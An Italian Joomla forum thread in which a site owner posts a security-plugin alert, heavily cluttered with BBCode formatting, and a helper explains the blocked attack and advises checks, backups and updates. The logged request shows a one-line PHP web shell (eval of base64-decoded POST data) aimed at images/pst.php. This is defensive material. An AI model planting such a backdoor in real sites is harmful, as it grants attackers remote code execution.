Autore Topic: Plugin Marco's interceptor (Letto 2109 volte)

bardolph · « **il:** 22 Ago 2012, 15:41:53 »

Buon giorno a tutti. Seguendi indicazioni dal forum ho installato in un mio sito in Joomla 2.5.6 il plugin in oggetto (anche senza aver capito bene il funzionamento)
Ora ho ricevuto una mail con questo contenuto:
[/code]

Codice: [Seleziona]

[color=rgb(34, 34, 34)][font=arial][size=13px]*REMOTE_ADDR :[/color][/font][/size][color=rgb(34, 34, 34)][font=arial][size=13px]84.73.83.250[/color][/font][/size][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px]*HTTP_USER_AGENT :[/color][/font][/size][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px]*REQUEST_METHOD :[/color][/font][/size][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px]POST[/color][/font][/size][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px]*QUERY_STRING :[/color][/font][/size][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px]*HTTP_REFERER :[/color][/font][/size][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px]none[/color][/font][/size][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px]** SUPERGLOBALS DUMP (sanitized)[/color][/font][/size][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px]*$_GET DUMP[/color][/font][/size][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px]*$_POST DUMP[/color][/font][/size][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px] -[path] => images/pst.php[/color][/font][/size][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px] -[raw_data] => <?php[/color][/font][/size][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px]eval (base64_decode($_POST["php"]))[/color][/font][/size][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px];[/color][/font][/size][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px]?>[/color][/font][/size][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px]*$_COOKIE DUMP[/color][/font][/size][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px]*$_REQUEST DUMP[/color][/font][/size][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px] -[path] => images/pst.php[/color][/font][/size][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px] -[raw_data] => <?php[/color][/font][/size][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px]eval (base64_decode($_POST["php"]))[/color][/font][/size][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px];[/color][/font][/size][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px]?>[/color][/font][/size]
[color=rgb(34, 34, 34)][font=arial][size=13px]
[/color][/font][/size]
[color=rgb(34, 34, 34)][font=arial][size=13px]Mi è sembrato di capire che ha impedito un attacco. Vorrei,se possibile, che qualcuno mi spiegasse il significato e mi indicasse se devo prendre qualche provvedimento.[/color][/font][/size]
[color=rgb(34, 34, 34)][font=arial][size=13px]Grazie in anticipo[/color][/font][/size]

jeckodevelopment · « **Risposta #1 il:** 22 Ago 2012, 18:00:46 »

Ciao bardolph,
il plugin in questione intercetta eventuali attacchi di tipo SQL Injection e Local File Inclusion.

nel tuo caso, l'attacco è diretto a questo file:

Citazione

images/pst.php

controlla che questo file non sia presente nella tua installazione di Joomla.

bardolph · « **Risposta #2 il:** 22 Ago 2012, 19:01:37 »

Grazie mille

jeckodevelopment · « **Risposta #3 il:** 22 Ago 2012, 19:25:46 »

un'ultima raccomandazione!
cerca di fare dei backup regolari di file e database e di tenere costantemente aggiornate la tua installazione di Joomla e tutte le estensioni installate (moduli, plugin, componenti, template framework, ecc)

Autore Topic: Plugin Marco's interceptor (Letto 2109 volte)

bardolph

Plugin Marco's interceptor

jeckodevelopment

Re:Plugin Marco's interceptor

bardolph

Re:Plugin Marco's interceptor

jeckodevelopment

Re:Plugin Marco's interceptor